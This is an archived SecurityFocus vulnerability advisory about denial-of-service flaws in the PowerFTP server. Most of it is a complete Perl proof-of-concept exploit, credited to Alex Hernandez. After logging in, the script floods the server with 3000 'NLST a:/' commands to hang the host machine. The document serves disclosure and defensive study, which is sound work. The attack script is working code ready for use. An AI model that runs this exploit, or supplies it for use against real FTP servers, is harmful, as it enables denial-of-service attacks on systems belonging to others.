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source: https://www.securityfocus.com/bid/3595/info
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PowerFTP is a commercial FTP server for Microsoft Windows 9x/ME/NT/2000/XP operating systems. It is maintained by Cooolsoft.
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Multiple instances of denial of service vulnerabilities exist in PowerFTP's FTP daemon. This is achieved by connecting to a vulnerable host and submitting an unusally long string of arbitrary characters.
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It has been reported that this issue may also be triggered by issuing an excessively long FTP command of 2050 bytes or more.
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This issue may is most likely due to a buffer overflow. If this is the case, there is a possibility that arbitrary code may be executed on the vulnerable host. However, this has not yet been confirmed.
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#!/usr/bin/perl
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#
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# Even though the server will deny access, the slow hardware
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# will still hang the machine. This program attempts to
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# exploit this weakness by sending the 'NLST a:/' command to
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# the server
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#
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# PowerFTP Server v2.03 proof-of-concept exploit
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# By Alex Hernandez <al3x.hernandez@ureach.com> (C)2001.
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#
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# Thanks all the people from Spain and Argentina.
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# Special Greets: White-B, Pablo S0r, Paco Spain, L.Martins,
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# G.Maggiotti & H.Oliveira.
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#
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#
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# Usage: perl -x PowerFTP_floppy.pl <server> <port> <user> <pass>
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#
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# Example:
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#
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# perl -x PowerFTP_floppy.pl 10.0.0.1 21 temp temp
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#
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use IO::Socket;
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print("\nPowerFTP server v2.03 DoS exploit Floppy (c)2001\n");
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print("Alex Hernandez al3xhernandez\@ureach.com\n\n");
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#$NUMBER_TO_SEND = 3000;
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$BUFF = 3000;
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if ( scalar @ARGV < 4 ) {
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print "Usage: $0 <server> <port> <user> <pass>\n";
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exit();
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}
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$target = $ARGV[ 0 ];
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$port = $ARGV[ 1 ];
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$username = $ARGV[ 2 ];
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$password = $ARGV[ 3 ];
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print "Creating socket... ";
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$sock = new IO::Socket::INET( PeerAddr => $target,
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PeerPort => int( $port ),
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Proto => 'tcp' );
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die "$!" unless $sock;
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print "done.\n";
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read( $sock, $buffer, 1 );
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print "Sending username...";
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print $sock "USER " . $username . "\n";
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read( $sock, $buffer, 1 );
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print "done.\n";
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print "Sending password...";
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print $sock "PASS " . $password . "\n";
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read( $sock, $buffer, 1 );
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print "done.\n";
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print "DoS Attack floppy server...";
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for( $i = 0; $i < $BUFF; $i++ ) {
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print $sock "NLST a:/\n";
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read( $sock, $buffer, 1 );
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}
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print "done.\n";
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close( $sock );
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exit(); |